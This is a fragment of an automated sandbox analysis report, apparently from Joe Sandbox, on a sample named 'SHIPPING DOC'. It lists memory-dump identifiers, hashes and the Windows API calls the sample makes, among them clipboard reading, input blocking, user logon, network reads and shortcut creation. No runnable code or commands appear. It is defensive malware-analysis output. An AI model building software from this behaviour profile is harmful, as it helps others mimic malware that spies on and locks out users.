                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4170576061-0
                                                                                                                      • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                      • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                      • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                      • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                      • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                      • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                      • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                      • IsIconic.USER32 ref: 0047A393
                                                                                                                      • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 292994002-0
                                                                                                                      • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                      • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                      • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                      • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                      • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                      • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                      • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                      • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                      • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                      APIs
                                                                                                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                      • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                      • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                      • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 15083398-0
                                                                                                                      • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                      • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                                      • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                      • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: U$\
                                                                                                                      • API String ID: 4104443479-100911408
                                                                                                                      • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                      • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                                      • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                      • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3541575487-0
                                                                                                                      • Opcode ID: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                                                                                                                      • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                      • Opcode Fuzzy Hash: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                                                                                                                      • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 48322524-0
                                                                                                                      • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                      • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                                      • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                      • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                                      APIs
                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 901099227-0
                                                                                                                      • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                                                                      • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                                      • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                                                                      • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                                      APIs
                                                                                                                      • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Proc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2346855178-0
                                                                                                                      • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                      • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                                      • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                      • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                                      APIs
                                                                                                                      • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BlockInput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3456056419-0
                                                                                                                      • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                      • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                                      • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                      • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                                      APIs
                                                                                                                      • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LogonUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1244722697-0
                                                                                                                      • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                      • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                                      • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                      • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                                      APIs
                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NameUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2645101109-0
                                                                                                                      • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                      • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                                      • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                      • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                      • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                                      • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                      • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: N@
                                                                                                                      • API String ID: 0-1509896676
                                                                                                                      • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                      • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                      • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                      • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                      • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                      • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                      • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
